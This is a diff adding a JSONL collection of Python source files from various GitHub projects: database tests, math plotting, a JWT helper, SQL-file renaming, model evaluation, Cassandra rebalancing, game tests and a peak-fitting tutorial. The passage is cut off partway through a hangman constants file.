diff --git "a/1725.jsonl" "b/1725.jsonl" new file mode 100644--- /dev/null +++ "b/1725.jsonl" @@ -0,0 +1,1874 @@ +{"seq_id":"28796880797","text":"#!/usr/bin/env python\n\n\"\"\" Class implementation of TestMelDBSqlite3Adapter\"\"\"\n\nimport unittest\n\nimport pytest\n\nfrom melospy.basic_representations.solo import *\nfrom melospy.input_output.esac_reader import *\nfrom melospy.input_output.mel_db_adapter_factory import *\nfrom melospy.input_output.mel_db_sqlite3_adapter import *\nfrom melospy.input_output.mel_db_sqlite3_adapter2 import *\nfrom melospy.input_output.read_sv_project import *\nfrom melospy.rootpath import root_path\nfrom melospy.tools.commandline_tools.dbinfo import *\n\nfrom tests.rootpath import *\n\ndef getDB(DB):\n dbpath= add_data_path(DB)\n if DB[0:3] == \"esac\":\n version = \"1\"\n else:\n version = \"2\"\n dbinfo = DBInfo.fromDict({'path': dbpath, \"use\": True, \"type\":\"sqlite3\", \"version\":version})\n return MelDBAdapterFactory(dbinfo).create()\n\nclass TestMelDBSqlite3Adapter( unittest.TestCase ):\n\n\n @pytest.mark.skip(reason=\"Irrelevant\")\n def testSpeed(self):\n #return\n with getDB(\"esac.db\") as mdb:\n\n start = time.process_time()\n for i in range(1, 100):\n try:\n esacSong = mdb.readSongs(i)\n except Exception as e:\n print(\"Error for melid = \", i)\n print(\"Read 100 songs in {} s\".format(round(time.process_time()-start, 3)))\n start = time.process_time()\n results = mdb.query(\"SELECT * FROM melody WHERE melid>=1 AND melid<=100\")\n #results = mdb.query(\"SELECT * FROM esac_info WHERE melid>=1 AND melid<=100\")\n #results = mdb.query(\"SELECT * FROM sections WHERE melid>=1 AND melid<=100\")\n print(\"Performed 3 queries in {} s\".format(round(time.process_time()-start, 3)))\n\n #@pytest.mark.skip(reason=\"DB-Path mismatch\")\n def testReadEsac(self):\n #return\n with getDB(\"esac.db\") as mdb:\n esacSong = mdb.readEsacSongs(2552)\n self.assertEqual(len(esacSong[2552]), 40)\n\n #@pytest.mark.skip(reason=\"DB-Path mismatch\")\n def testReadSolo(self):\n #return\n with getDB(\"wjazzd.db\") as mdb:\n song = mdb.readSolos(1)\n self.assertEqual(len(song[1]), 530)\n\n\n #@pytest.mark.skip(reason=\"DB-Path mismatch\")\n def testReadSongs(self):\n #return\n with getDB(\"wjazzd.db\") as mdb:\n song = mdb.readSongs(1)\n self.assertEqual(len(song[1]), 530)\n\n with getDB(\"esac.db\") as mdb:\n song = mdb.readSongs(1)\n self.assertEqual(len(song[1]), 60)\n\n @pytest.mark.skip(reason=\"Too long\")\n def testReadMelodies(self):\n #return\n start = time.process_time()\n with getDB(\"esac.db\") as mdb:\n esacSongs = mdb.readMelodies()\n print(len(esacSongs ))\n self.assertEqual(len(esacSongs), 7352)\n\n print(\"Read Esac melodies in {}s\".format(time.process_time()-start))\n\n @pytest.mark.skip(reason=\"Too long\")\n def testReadEsacMetadata(self):\n #return\n start = time.process_time()\n with getDB(\"esac.db\") as mdb:\n esacMeta = mdb.readEsacMetadata()\n self.assertEqual(len(esacMeta ), 7352)\n print(\"Read Esac metadata in {}s\".format(time.process_time()-start))\n\n @pytest.mark.skip(reason=\"Too long\")\n def testReadEsacSongs(self):\n #return\n start = time.process_time()\n print(\"Reading ESAC songs...\")\n with getDB(\"esac.db\") as mdb:\n esacSongs = mdb.readSongs()\n self.assertEqual(len(esacSongs), 7352)\n print(\"Read all Esac songs in {} s\".format(time.process_time()-start))\n\n #@pytest.mark.skip(reason=\"DB-Path mismatch\")\n def testReadSolos(self):\n #return\n timer = Timer()\n melids = [1, 2, 3]\n with getDB(\"omnibook.db\") as mdb:\n solos = mdb.readSolos(melids)\n print(\"Read three solos in {} s\".format(timer.end()))\n self.assertEqual(len(solos), 3)\n\n @pytest.mark.skip(reason=\"Too long\")\n def testReadBeattracks(self):\n #return\n timer = Timer()\n melids = [1]\n with getDB(\"wjazzd.db\") as mdb:\n bt = mdb.readBeatTracks()\n print(\"Read all beattracks in {} s\".format(timer.end()))\n self.assertEqual(len(bt), 456)\n\n\n @pytest.mark.skip(reason=\"Too long\")\n def testReadSections(self):\n #return\n #path_to_db = self.getDBpath(\"wjazzd.db\")\n timer = Timer()\n melids = [17, 18, 114]\n with getDB(\"wjazzd.db\") as mdb:\n sect = mdb.readSections(with_parse = False)\n print(\"Read all sections in {} s\".format(timer.end()))\n self.assertEqual(len(sect), 456)\n\n timer.start()\n sect = mdb.readSections(sectType=\"PHRASE\")\n print(\"Read phrase sections in {} s\".format(timer.end()))\n self.assertEqual(len(sect), 456)\n\n timer.start()\n sect = mdb.readSections(melids)\n print(\"Read sections for three melodies in {} s\".format(timer.end()))\n self.assertEqual(len(sect), 3)\n\n timer.start()\n sect = mdb.readSections(melids, sectType=\"PHRASE\")\n print(\"Read phrase sections for three melodies in {} s\".format(timer.end()))\n self.assertEqual(len(sect), 3)\n\n #@pytest.mark.skip(reason=\"OperationalError: no such table: sections\")\n def testReadEsacSections(self):\n #return\n timer = Timer()\n melids = [17, 18, 114]\n with getDB(\"esac.db\") as mdb:\n sect = mdb.readSections(with_parse=False)\n print(\"Read all sections in {} s\".format(timer.end()))\n\n timer.start()\n sect = mdb.readSections(sectType=\"PHRASE\", with_parse=False)\n print(\"Read phrase sections in {} s\".format(timer.end()))\n timer.start()\n sect = mdb.readSections(melids, with_parse=False)\n print(\"Read sections for three melodies in {} s\".format(timer.end()))\n self.assertEqual(len(sect), 3)\n timer.start()\n sect = mdb.readSections(melids, sectType=\"PHRASE\", with_parse=False)\n print(\"Read phrase sections for three melodies in {} s\".format(timer.end()))\n self.assertEqual(len(sect), 3)\n timer.start()\n sect = mdb.readSections(melids[0], sectType=\"PHRASE\", with_parse=False)\n print(\"Read phrase sections for three melodies in {} s\".format(timer.end()))\n sect = mdb.parseSection(sect[melids[0]], \"PHRASE\")\n self.assertEqual(len(sect), 7)\n\n @pytest.mark.skip(reason=\"Too long\")\n def testReadSoloMetadata(self):\n #return\n\n start = time.process_time()\n with getDB(\"wjazzd.db\") as mdb:\n solos = mdb.readSoloMetadata()\n self.assertEqual(len(solos), 456)\n print(\"Read all solo metadata in {}s\".format(time.process_time()-start))\n\n @pytest.mark.skip(reason=\"Too long\")\n def testReadDatabase(self):\n #return\n start = time.process_time()\n with getDB(\"wjazzd.db\") as mdb:\n solos = mdb.readDatabase()\n self.assertEqual(len(solos), 456)\n print(\"Read wjazzd database in {}s\".format(time.process_time()-start))\n\n @pytest.mark.skip(reason=\"Too long\")\n def testConstructor(self):\n \"\"\" Initialize module \"\"\"\n return\n esac_reader = EsacReader(add_data_path(\"K0001.esa\"))\n song = esac_reader.solo\n ei = esac_reader.esacinfo\n song.setMetadata(ei)\n #print song\n with getDB(\"esac_test.db\") as mdb:\n mdb.createDatabase()\n mdb.insertEsacSong(song, ei)\n esacSong = mdb.readEsacSongs(1)\n self.assertEqual(len(esacSong[1]), len(song ))\n\n s = SVReader(add_data_path(\"SonnyRollins_TenorMadness_FINAL.sv\"))\n svp = SVReaderParams(flexq = FlexQParams())\n s.bundle(svp, normalize = False, diagnostic = False)\n solo1 = s.solo\n si = SoloInfo(performer = \"Sonny Rollins\", title=\"Tenor Madness\")\n ti = TranscriptionInfo(fileNameSV = \"SonnyRollins_TenorMadness_FINAL.sv\")\n ri = RecordInfo(artist = \"Sonny Rollins\")\n ci = CompositionInfo(title = \"Tenor Madness\", composer = \"Sonny Rollins\")\n smd = SoloMetaData(soloInfo = si, transcriptionInfo = ti, recordInfo = ri, compositionInfo = ci)\n solo1.setMetadata(smd)\n\n s = SVReader(add_data_path(\"BobBerg_Angles_FINAL.sv\"))\n s.bundle(svp, normalize = False, diagnostic = False)\n solo2 = s.solo\n si = SoloInfo(performer = \"Bob Berg\", title=\"Angles\")\n ti = TranscriptionInfo(fileNameSV = \"BobBerg_Angles_FINAL.sv\")\n ri = RecordInfo(artist = \"Bob Berg\")\n ci = CompositionInfo(title = \"Angles\", composer = \"Bob Berg\")\n smd = SoloMetaData(soloInfo = si, transcriptionInfo = ti, recordInfo = ri, compositionInfo = ci)\n solo2.setMetadata(smd)\n\n with getDB(\"wjazzd_test.db\") as mdb:\n mdb.createDatabase()\n mdb.insertSolo(solo1)\n mdb.insertSolo(solo2)\n solo = mdb.readSolos(1)\n #print len(solo[1]), len(solo1)\n self.assertEqual(len(solo[1]) == len(solo1), True)\n solo = mdb.readSolos(2)\n self.assertEqual(len(solo[2]) == len(solo2), True)\n soli = mdb.readDatabase()\n self.assertEqual(len(soli), 2)\n vals = mdb.getMelIDsByFilenameSV('%_FINAL.sv')\n self.assertEqual(vals, [1, 2] )\n\n\"\"\" Function calls all unit tests \"\"\"\nif __name__ == '__main__':\n alltests = unittest.TestSuite([unittest.TestLoader().loadTestsFromTestCase(TestMelDBSqlite3Adapter)])\n unittest.main()\n","repo_name":"klausfrieler/melospy","sub_path":"tests/input_output/test_mel_db_sqlite.py","file_name":"test_mel_db_sqlite.py","file_ext":"py","file_size_in_byte":9685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10871581592","text":"\"\"\" A script to plot the limit set of a particular cusp group.\n\n This is only as accurate as the riley.cusp_point() function allows (i.e. make sure you have\n sacrificed the correct number of goats before running the script...).\n\n The limit point seeds are the fixed points of the 0/1, 1/1, and 1/2 Farey words at the given cusp point.\n\n Limit set is computed all at once and ploted with pyplot so if the numbers you try to run are too big\n then you will run out of memory very quickly. Try cusps_shaded.py if this is bad.\n\n Options to change:\n p, q -- orders of the elliptic elements (set to mp.inf for the parabolic case)\n r, s -- slope of the desired cusp\n reps -- you should be able to run kleinian.limit_set_markov with reps set to this value.\n depth -- maximum word length to compute orbits with\n\n Output image filename is cusp_{r}_{s}_elliptic_{p}_{q}.png (in the current directory).\n\"\"\"\nfrom mpmath import mp\nimport kleinian\nimport matplotlib.pyplot as plt\nimport riley\nimport farey\nimport itertools\n\n# Orders of elliptics\np = 3\nq = 5\n\n# Cusp slope\nr = 1\ns = 2\n\nreps = 100000\ndepth = 20\n\n\n\n\nfilename = f'cusp_{r}_{s}_elliptic_{p}_{q}.png'\nmu = riley.cusp_point(p,q,r,s)\n\nalpha = mp.exp(2j*mp.pi/p)\nbeta = mp.exp(2j*mp.pi/q)\nX = mp.matrix([[alpha,1],[0,mp.conj(alpha)]])\nY = mp.matrix([[beta,0],[mu,mp.conj(beta)]])\n\nseeds = farey.fixed_points(0,1,mu,alpha,beta)\\\n + farey.fixed_points(1,1,mu,alpha,beta)\\\n + farey.fixed_points(1,2,mu,alpha,beta)\n\nls = kleinian.limit_set_markov([X,Y],mp.matrix(seeds),depth,reps)\n\ncolours = {-2: 'r', -1:'b', 1:'g', 2:'y'}\nprint((ls.rows,ls.cols))\nplt.scatter([mp.re(t[0]) for t in ls],[mp.im(t[0]) for t in ls],c=[colours[t[1]] for t in ls],s=.1,alpha=.1,marker='.',linewidths=0)\n\nplt.axis('equal')\nplt.axis([-2,2,-1,2])\nplt.tight_layout()\nplt.show()\nplt.savefig(filename,dpi=2000)\n","repo_name":"aelzenaar/riley","sub_path":"cusps.py","file_name":"cusps.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72650886452","text":"import jwt\nfrom flask import current_app as app\n\n\ndef get_admin_id(token):\n '''\n Function that given a token, it returns its id.\n :param srt token: the token.\n :rtype: int\n ''' \n try:\n payload = jwt.decode(token, app.config['SECRET_KEY'], \n algorithms=['HS256'])\n except jwt.ExpiredSignatureError:\n return jsonify('''Token expired'''), 401\n except jwt.InvalidSignatureError:\n return jsonify('''Signature verification failed'''), 401\n return payload['id']\n \n \n ","repo_name":"CarlosEspinoTimon/crm_service_old","sub_path":"backend/server/helpers/users_helper.py","file_name":"users_helper.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71570906932","text":"import os\n\nimport config\nfrom git import git_mv\nfrom msql import sqlfiles\nfrom msql.pattern import *\n\n\nclass RenameBranchSQLFiles:\n def __init__(self, project_file):\n if not project_file.loaded:\n project_file.load()\n\n self.project_file = project_file\n\n def rename_branch_sql_files(self):\n print(\"Rename [Update] SQL Files And Update Project File\")\n u_num = self.__rename_sql_files(UPDATE_SQL_FILE_PATTERN)\n\n print(\"Rename [Conversion] SQL Files And Update Project File\")\n c_num = self.__rename_sql_files(CONVERSION_SQL_FILE_PATTERN)\n\n print(\"Rename [Metric SQL] Files And Update Project File\")\n m_num = self.__rename_sql_files(METRIC_SQL_FILE_PATTERN)\n\n print(\"Update [CurrentVersion.txt] {0}\\{1}\\{2}\".format(u_num, c_num, m_num))\n self.__update_current_version_files(u_num, c_num, m_num)\n\n def __rename_sql_files(self, file_pattern):\n num = sqlfiles.get_max_file_num(file_pattern.search_pattern)\n for f in sqlfiles.get_branch_sql_files(file_pattern.branch_search_pattern):\n num += 1\n self.__rename_sql_file(f, file_pattern.output_file_format.format(num))\n return num\n\n def __rename_sql_file(self, src_name, dst_name):\n update_folder_path = os.path.join(config.BASE_DIR, config.PATH_SCHEMA_UPDATE_FOLDER)\n proj_src = os.path.join(config.PROJECT_PATH_SCHEMA_UPDATE_FOLDER, src_name)\n proj_dst = os.path.join(config.PROJECT_PATH_SCHEMA_UPDATE_FOLDER, dst_name)\n file_src = os.path.join(update_folder_path, src_name)\n file_dst = os.path.join(update_folder_path, dst_name)\n res = self.project_file.get_res(proj_src)\n if res is not None:\n git_mv(file_src, file_dst, cwd=config.BASE_DIR)\n self.project_file.rename(proj_src, proj_dst)\n else:\n raise Exception(\"[\" + proj_src + \"] is not a resource in project\")\n\n @staticmethod\n def __update_current_version_files(u_num, c_num, m_num):\n file_path = os.path.join(config.BASE_DIR, config.PATH_CURRENT_VERSION_TXT)\n with open(file_path, 'w') as f:\n f.write(\"{0}\\n{1}\\n{2}\".format(u_num, c_num, m_num))\n","repo_name":"chao-zhou/msql","sub_path":"msql/rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":2196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17612111054","text":"import h5py, os\nimport numpy as np\nfrom six.moves import cPickle\nimport argparse\nimport tensorflow as tf\nimport model_zoo\n\n#-----------------------------------------------------------------\n\n\ndef get_data(path, dataset='test'):\n with h5py.File(path, \"r\") as f:\n x = f[\"/deepsea/\"+dataset+\"/features\"][:].astype(np.float32)\n y = f[\"/deepsea/\"+dataset+\"/labels\"][:].astype(np.float32)\n return x, y\n\n#-----------------------------------------------------------------\n\nmodel_names = ['deepsea', 'basset', 'deepsea_custom', 'basset_custom']\nactivations = ['relu', 'exponential']\ntrial = 0\n\n# set paths\nresults_path = '../results_deepsea'\nif not os.path.exists(results_path):\n os.makedirs(results_path)\n\n# load data\ndata_path = '../../data'\n\nfilepath = os.path.join(data_path, 'deepsea_dataset.h5')\nx_test, y_test = get_data(filepath, dataset='test')\n\n# get shapes\nN, L, A = x_test.shape\nnum_labels = y_test.shape[1]\n\n\nwith open(os.path.join(results_path, 'results.txt'), 'w') as fout:\n\n results = []\n for model_name in model_names:\n for activation in activations:\n tf.keras.backend.clear_session()\n # build model\n if model_name == 'deepsea':\n model = model_zoo.deepsea((L,A), num_labels, activation)\n elif model_name == 'danq':\n model = model_zoo.danq((L,A), num_labels, activation)\n elif model_name == 'basset':\n model = model_zoo.basset((L,A), num_labels, activation)\n elif model_name == 'deepatt':\n model = model_zoo.deepatt((L,A), num_labels, activation)\n elif model_name == 'cnn_att':\n model = model_zoo.cnn_att((L,A), num_labels, activation)\n elif model_name == 'cnn_lstm_trans_1':\n model = model_zoo.cnn_lstm_trans((L,A), num_labels, activation, num_layers=1)\n elif model_name == 'cnn_lstm_trans_2':\n model = model_zoo.cnn_lstm_trans((L,A), num_labels, activation, num_layers=2)\n elif model_name == 'cnn_lstm_trans_4':\n model = model_zoo.cnn_lstm_trans((L,A), num_labels, activation, num_layers=4)\n elif model_name == 'cnn_trans_1':\n model = model_zoo.cnn_trans((L,A), num_labels, activation, num_layers=1)\n elif model_name == 'cnn_trans_2':\n model = model_zoo.cnn_trans((L,A), num_labels, activation, num_layers=2)\n elif model_name == 'cnn_trans_4':\n model = model_zoo.cnn_trans((L,A), num_labels, activation, num_layers=4)\n elif model_name == 'deepsea_custom':\n model = model_zoo.deepsea_custom((L,A), num_labels, activation)\n elif model_name == 'danq_custom':\n model = model_zoo.danq_custom((L,A), num_labels, activation)\n elif model_name == 'basset_custom':\n model = model_zoo.basset_custom((L,A), num_labels, activation)\n else:\n print(\"can't find model\")\n print(model_name + '_' + activation)\n\n # compile model model\n auroc = tf.keras.metrics.AUC(curve='ROC', name='auroc')\n aupr = tf.keras.metrics.AUC(curve='PR', name='aupr')\n model.compile(tf.keras.optimizers.Adam(0.001), loss='binary_crossentropy', metrics=[auroc, aupr])\n\n # load model params\n name = model_name + '_' + activation + '_' + str(trial)\n model_dir = os.path.join(results_path, name+'_weights.h5')\n model.load_weights(model_dir)\n\n # get test performance\n test_results = model.evaluate(x_test, y_test, batch_size=100)\n \n # save results\n fout.write(\"%s\\t%s\\t%.4f\\t%.4f\\n\"%(model_name, activation, test_results[1], test_results[2]))\n\n\n\n","repo_name":"p-koo/gradient_correction","sub_path":"test_all.py","file_name":"test_all.py","file_ext":"py","file_size_in_byte":3806,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"41164378979","text":"from __future__ import division\nimport logging\nimport os\n\nfrom appscale.common.appscale_utils import ssh\nfrom appscale.common.constants import KEY_DIRECTORY\nfrom appscale.common.constants import LOG_FORMAT\nfrom subprocess import (CalledProcessError,\n check_output)\nfrom ..cassandra_env.cassandra_interface import NODE_TOOL\nfrom ..cassandra_env.cassandra_interface import KEYSPACE\n\n\n# The percentage difference allowed between an actual and ideal load.\nMAX_DRIFT = .3\n\n\nclass InvalidUnits(Exception):\n \"\"\" Indicates an unexpected units value. \"\"\"\n pass\n\n\ndef load_bytes(value, units):\n \"\"\" Convert a human-friendly size to bytes.\n\n Args:\n value: A float containing a size.\n units: A string specifying the units.\n Returns:\n An integer representing the number of bytes.\n Raises:\n InvalidUnits if the units string is not recognized.\n \"\"\"\n magnitudes = {'KiB': 1, 'MiB': 2, 'GiB': 3, 'TiB': 4}\n if units not in magnitudes:\n raise InvalidUnits('{} not a recognized unit'.format(units))\n return int(value * 1024 ** magnitudes[units])\n\n\ndef get_status():\n \"\"\" Return the cluster status in a structured way.\n\n Returns:\n A list of nodes represented by dictionaries.\n \"\"\"\n nodes = []\n for line in check_output([NODE_TOOL, 'status', KEYSPACE]).splitlines():\n fields = line.split()\n if len(fields) != 8:\n continue\n nodes.append({\n 'state': fields[0],\n 'ip': fields[1],\n 'tokens': int(fields[4]),\n 'owns': float(fields[5][:-1])\n })\n return nodes\n\n\ndef get_ring():\n \"\"\" Return the ring status in a structured way.\n\n Returns:\n A list of nodes represented by dictionaries.\n \"\"\"\n ring_output = check_output([NODE_TOOL, 'ring', KEYSPACE])\n ring = []\n index = 0\n for line in ring_output.splitlines():\n fields = line.split()\n if len(fields) != 8:\n continue\n\n ring.append({\n 'index': index,\n 'ip': fields[0],\n 'status': fields[2],\n 'state': fields[3],\n 'load': load_bytes(float(fields[4]), fields[5]),\n 'token': fields[7]\n })\n index += 1\n\n assert len(ring) > 0\n\n # Calculate skew and diff for each node in ring.\n ideal_load = sum(node['load'] for node in ring) / len(ring)\n for index, node in enumerate(ring):\n try:\n node['skew'] = abs(node['load'] - ideal_load) / ideal_load\n except ZeroDivisionError:\n node['skew'] = 0\n node['diff'] = abs(node['load'] - ring[index - 1]['load'])\n\n return ring\n\n\ndef equalize(node1, node2):\n \"\"\" Move data from the node with a larger load to the other one.\n\n Args:\n node1: A dictionary representing a node.\n node2: A dictionary representing a neighbor of node1.\n \"\"\"\n keys = [key for key in os.listdir(KEY_DIRECTORY) if key.endswith('.key')]\n keyname = keys[0].split('.')[0]\n\n to_move = abs(node1['load'] - node2['load']) / 2\n mb_to_move = round(to_move / 1024 ** 2, 2)\n if node1['load'] > node2['load']:\n logging.info('Moving {} MiB from {} to {}'.format(\n mb_to_move, node1['ip'], node2['ip']))\n percentile = 100 - int((to_move / node1['load']) * 100)\n new_token = ssh(node1['ip'], keyname,\n 'appscale-get-token {}'.format(percentile),\n method=check_output).strip()\n repair = [new_token, node1['token']]\n cleanup_ip = node1['ip']\n else:\n logging.info('Moving {} MiB from {} to {}'.format(\n mb_to_move, node2['ip'], node1['ip']))\n percentile = int((to_move / node2['load']) * 100)\n new_token = ssh(node2['ip'], keyname,\n 'appscale-get-token {}'.format(percentile),\n method=check_output).strip()\n repair = [node1['token'], new_token]\n cleanup_ip = node2['ip']\n\n logging.info('Moving {} to {}'.format(node1['ip'], new_token[:60] + '...'))\n ssh(node1['ip'], keyname, '{} move {}'.format(NODE_TOOL, new_token))\n\n start = repair[0][:60] + '...'\n end = repair[1][:60] + '...'\n logging.info('Repairing {} to {}'.format(start, end))\n check_output([NODE_TOOL, 'repair', '-st', repair[0], '-et', repair[1]])\n\n logging.info('Cleaning up {}'.format(cleanup_ip))\n ssh(cleanup_ip, keyname, '{} cleanup'.format(NODE_TOOL))\n\n\ndef main():\n logging.basicConfig(format=LOG_FORMAT, level=logging.INFO)\n logging.info('Fetching status')\n status = get_status()\n\n # All nodes must have just one token.\n assert {node['tokens'] for node in status} == {1}\n\n # There must be more than one node up to balance.\n assert len([node for node in status if node['state'] == 'UN']) > 1\n\n # If all nodes own everything, a rebalance is not possible.\n assert {node['owns'] for node in status} != {float(100)}\n\n logging.info('Fetching ring')\n ring = get_ring()\n if max(node['skew'] for node in ring) < MAX_DRIFT:\n logging.info('All nodes within {}% of ideal load'.format(MAX_DRIFT * 100))\n return\n\n # Pick two neighboring nodes with the largest difference in load. If the\n # equalization process fails, try the next largest difference.\n ring_by_diff = sorted(ring, key=lambda node: node['diff'], reverse=True)\n for node in ring_by_diff:\n try:\n equalize(ring[node['index'] - 1], ring[node['index']])\n # If data has been moved, the load needs to be re-evaluated. Load gets\n # updated after 90 seconds.\n break\n except CalledProcessError:\n continue\n","repo_name":"HafeezRai/appscale","sub_path":"AppDB/appscale/datastore/cassandra_env/rebalance.py","file_name":"rebalance.py","file_ext":"py","file_size_in_byte":5287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23264131923","text":"import sys\nsys.path.append('player_classes')\nsys.path.append('games')\nfrom game_0_2 import Game\nfrom custom_player import CustomPlayer\n\ntests = [\n {'seed': 0, 'winner': 2},\n {'seed': 1, 'winner': 1},\n {'seed': 2, 'winner': 2},\n {'seed': 3, 'winner': 1},\n {'seed': 4, 'winner': 1},\n {'seed': 5, 'winner': 2},\n {'seed': 6, 'winner': 2},\n {'seed': 7, 'winner': 1},\n {'seed': 8, 'winner': 1},\n {'seed': 9, 'winner': 1}\n]\n\nfor test in tests:\n players = [CustomPlayer(), CustomPlayer()]\n random_seed = test['seed']\n\n game = Game(players, random_seed)\n game.run_to_completion()\n\n desired_winner = test['winner']\n assert(game.game_state['winner'] == desired_winner)","repo_name":"snowthesprite/space-empires","sub_path":"tests/test_game_level_0_2_random_seeds.py","file_name":"test_game_level_0_2_random_seeds.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10073348224","text":"\n\ndef check(name1 , name2 , p , q):\n b1 = True\n b2 = True\n\n for i in range(p):\n if name1[i] != name2[i]:\n b1 = False\n break\n else:\n b1 = True\n\n for i in range(q):\n if name1[len(name1)- i -1] != name2[len(name2)- i -1]:\n b2 = False\n break\n else:\n b2 = True\n\n if b1 and b2:\n return True\n else:\n return False\n\n\nn ,p , q = map(int , input().split())\nnames = []\nfor i in range(n):\n names.append(input())\n\nnames.sort()\n\nfor i in names:\n for j in names[names.index(i) + 1:]:\n\n if i[0] != j[0] :\n break\n if check(i,j,p,q):\n names.remove(j)\n\n\nprint(len(names))","repo_name":"mmdaz/my_solved_algorithm_problems","sub_path":"old-codes/snapp.py","file_name":"snapp.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"10272518513","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Introduction to Peak Fitting in Python\n\n# So far you have been introduced to the python programming language, working with arrays, importing data, and doing simple curve fitting. In this tutorial we are going to apply those skills to peak fitting data to determine lattice spacing and peak intensity.\n# \n# After this tutorial you should be able to:\n# \n# Determine lattice spacing and intensity using gaussian peak fitting\n# Find lattice parameters to fit Data to the (100) peak and the (200) peak \n# \n# We'll be using the same imports as our previous tutorials with one important addition. We'll be adding a theta to q function, that makes it very easy for us to import to look at our data with respect to Q\n\n# In[4]:\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.stats\nfrom scipy.optimize import curve_fit\nimport pandas as pd\n\n\n# # Importing the Data\n# For this tutorial I already have a datafile of xrd data. This datafile is stacked .csv where the first column is the value of 2-theta and subsequent columns are diffracted intensity for a variety of samples.\n# To import the data we're going to define a function \"csv_to_np\" which will use the read_csv function built into pandas to pull the data, and then convert it to a numpy array since we're already familiar with working with those.\n\n# First, given that It's worthwhile to make a function that will convert our data with respect to Q go ahead and use the two_to_q function built to pull the data, and takes in an array of 2-theta values and a X-ray wavelength 𝜆, and returns an array of Q values.\n\n# In[5]:\n\n\ndef two_to_q(two_theta, wave):\n #two_theta is a 1D array of two_theta angles\n #wave is the X-ray energy in angstroms\n rad_theta = two_theta/2*np.pi/180\n q = 4*np.pi*np.sin(rad_theta)/wave\n return q\n\n\n# In[6]:\n\n\ndef csv_to_np(filename):\n data = pd.read_csv(filename)\n return(np.array(data))\n\nperov = csv_to_np('D1_MAPBIBr2_Xraydeg.csv')\n\n\n# In[ ]:\n\n\n# Exercise 5\nq_1 = 2.04 # This will be the lower limit for Q we'll consider\nq_2 =2.15\nlimit1 = find_nearest(q, q_1) #First our lower limit\nlimit2 = find_nearest(q, q_2) #And of our higher limit\nq_sub = q[limit1:limit2] # We'll reduce the domain of Q\nperov_sub = perov[limit1:limit2,1:]\n\nq_linear = np.hstack((q_sub[0:10], q_sub[-11:-1])) #I'm taking the starting and ending values\nperov_linear = np.hstack((perov_sub[0:10,0], perov_sub[-11:-1,0])) #We'll use these to fit a straight line\nslope, intercept = np.polyfit(q_linear, perov_linear, 1) #Do linear fit\nback = slope*q_sub+intercept #Create background array of the form Background = Ax+B\n#print (back)\n\n#plt.plot(q_sub,perov_sub[:,1], 'r-',label='$MAPbIBr_2$')# plot minus background \n#Let's begin by getting our data ready to analyze\nperov_fit = perov_sub[:,0]-back #We'll begin by subtracting the background we calculated for this piece of data\n\n#Now let's define a function we'll want to fit to - this is analagous to the \"straight-line-model\" from tutorial 03\n#We'll call our function gaussian and it will calculate the expression described above\ndef gaussian(x, a, b, c): \n return a*np.exp(-(x - b)**2/(2*c**2))\n\n#We'll also give an initial guess for our fits based off of a visual interpretaion of our data\np0 = [45, 2.4, 2] #(height, center, width)\n\n#Use scipy.optimize.curve_fit to fit our desired data\npopt, pcov = curve_fit(gaussian, q_sub, perov_fit, p0)\n\n#To confirm our fits it's always nice to plot our model versus our data.\nplt.figure(figsize=(8,6)) #make plot larger\nplt.plot(q_sub,perov_fit,'r-', label='$MAPbIBr_2$') #plot subfield of data\nplt.plot(q_sub,gaussian(q_sub, *popt),'b--', label='Model') #plot best fit\nplt.xlabel('Q [$\\AA^{-1}$]',size=12) #Define x-axis label\nplt.ylabel('Intensity [a.u.]',size=12)#Define y-axis label\nplt.legend(loc=\"upper right\")#Put legend in upper left hand corner\n\n#FEEDBACK I'd consider how this builds off of 04 - is this an answer to exercise 5? If so should we incorporate it into tutorial 04\n#Make sure there is an opportunitiy for students to practice, maybe you want them to write pseudocode first? Write their own definitiion?\n#FEEDBACK I like the idea of this building to a multi-peak fitting scenario. Perhaps you want folks to fit a complicated\n#function with a single peak first, calculate the uncertainty, and then repeart with multiple gaussians? \n#FEEDBACK I think an alternative would be to make this an alternative peak fitting tutorial - i.e. compare pvoigt and gaussian\n\n","repo_name":"Wellesley-Solar/training","sub_path":"other turotials/05_Introduction to Peak Fitting for XRD.py","file_name":"05_Introduction to Peak Fitting for XRD.py","file_ext":"py","file_size_in_byte":4515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74991706933","text":"'''\n Assignment - Project 1: Hangman\n File: constants.py\n Description: This file contains all of the constants used in the game\n James Halladay\n Advanced Programming with Python\n Date: 8/29/2022\n\n\n *******************************************************************************\n\n *******************************************************************************\n'''\n\nfrom typing import (\n Any,\n Dict,\n List,\n Tuple,\n)\n\nfrom enum import Enum\n\n# database constants\n\nDB_NAME = \"hangman.db\"\n\nPLAYER_TABLE = \"Players\"\n\nclass ColumnNames():\n '''\n This class contains the column names for the player table\n '''\n NAME = 'Name'\n WINS = 'Wins'\n LOSSES = 'Losses'\n\n\nPLAYER_TABLE_COLUMNS = [\n 'Name', \n 'Wins', \n 'Losses'\n]\n\nPLAYER_TABLE_SCHEMA = [\n 'TEXT',\n 'INTEGER',\n 'INTEGER'\n]\n\n# file constants\n\nUTILITY_DIR = 'utils'\n\nWORD_FILE = 'words.json'\n\n# Model constants\n\nDEFAULT_PLAYER_NAME = 'player'\n\nDEFAULT_WINS = 0\n\nDEFAULT_LOSSES = 0\n\nDEFAULT_MAX_SCORE = 7\n\nDEFAULT_DIFFICULTY = 